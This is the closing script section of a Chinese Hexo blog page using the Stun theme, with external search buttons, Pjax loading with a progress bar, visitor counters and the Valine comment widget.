  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', '请输入字符');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="https://cdn.jsdelivr.net/npm/pjax@latest/pjax.min.js"></script><script>window.addEventListener('DOMContentLoaded', function () {
  var pjax = new Pjax({"selectors":["head title","#main",".pjax-reload"],"history":true,"scrollTo":false,"scrollRestoration":false,"cacheBust":false,"debug":false,"currentUrlFullReload":false,"timeout":0});
  // 加载进度条的计时器
  var loadingTimer = null;

  // 重置页面 Y 方向上的滚动偏移量
  document.addEventListener('pjax:send', function () {
    $('.header-nav-menu').removeClass('show');
    if (CONFIG.pjax && CONFIG.pjax.avoidBanner) {
      $('html').velocity('scroll', {
        duration: 500,
        offset: $('#header').height(),
        easing: 'easeInOutCubic'
      });
    }

    var loadingBarWidth = 20;
    var MAX_LOADING_WIDTH = 95;

    $('.loading-bar').addClass('loading');
    $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    clearInterval(loadingTimer);
    loadingTimer = setInterval(function () {
      loadingBarWidth += 3;
      if (loadingBarWidth > MAX_LOADING_WIDTH) {
        loadingBarWidth = MAX_LOADING_WIDTH;
      }
      $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    }, 500);
  }, false);

  window.addEventListener('pjax:complete', function () {
    clearInterval(loadingTimer);
    $('.loading-bar__progress').css('width', '100%');
    $('.loading-bar').removeClass('loading');
    setTimeout(function () {
      $('.loading-bar__progress').css('width', '0');
    }, 400);
    $('link[rel=prefetch], script[data-pjax-rm]').each(function () {
      $(this).remove();
    });
    $('script[data-pjax], #pjax-reload script').each(function () {
      $(this).parent().append($(this).remove());
    });

    if (Stun.utils.pjaxReloadBoot) {
      Stun.utils.pjaxReloadBoot();
    }
    if (Stun.utils.pjaxReloadScroll) {
      Stun.utils.pjaxReloadScroll();
    }
    if (Stun.utils.pjaxReloadSidebar) {
      Stun.utils.pjaxReloadSidebar();
    }
    if (false) {
      if (Stun.utils.pjaxReloadHeader) {
        Stun.utils.pjaxReloadHeader();
      }
      if (Stun.utils.pjaxReloadScrollIcon) {
        Stun.utils.pjaxReloadScrollIcon();
      }
      if (Stun.utils.pjaxReloadLocalSearch) {
        Stun.utils.pjaxReloadLocalSearch();
      }
    }
  }, false);
}, false);</script><div id="pjax-reload"><script src="https://cdn.jsdelivr.net/gh/sukkaw/busuanzi@latest/bsz.pure.mini.js" async></script></div><script src="https://cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script data-pjax="">function loadValine () {
  var GUEST_INFO = ['nick', 'mail', 'link'];
  var guest_info = 'nick,mail,link';

  guest_info = guest_info.split(',').filter(function(item) {
    return GUEST_INFO.indexOf(item) > -1;
  });
  new Valine({
    el: '#valine-container',
    appId: 'PRycUaQbxE5mebmnKTjtaRJg-gzGzoHsz',
    appKey: 'jGyP9zr05MTuqHpWaIkgYW4h',
    notify: true,
    verify: true,
    placeholder: '写点什么吧',
    avatar: 'mp',
    meta: guest_info,
    pageSize: '10' || 10,
    visitor: true,
    recordIP: true,
    lang: 'zh-cn,en' || 'zh-cn',
    path: window.location.pathname
  });
}

if (true) {
  loadValine();
} else {
  window.addEventListener('DOMContentLoaded', loadValine, false);
}</script><script src="/js/utils.js?v=2.6.2"></script><script src="/js/stun-boot.js?v=2.6.2"></script><script src="/js/scroll.js?v=2.6.2"></script><script src="/js/header.js?v=2.6.2"></script><script src="/js/sidebar.js?v=2.6.2"></script><script type="application/json" src="/search.xml"></script></body></html>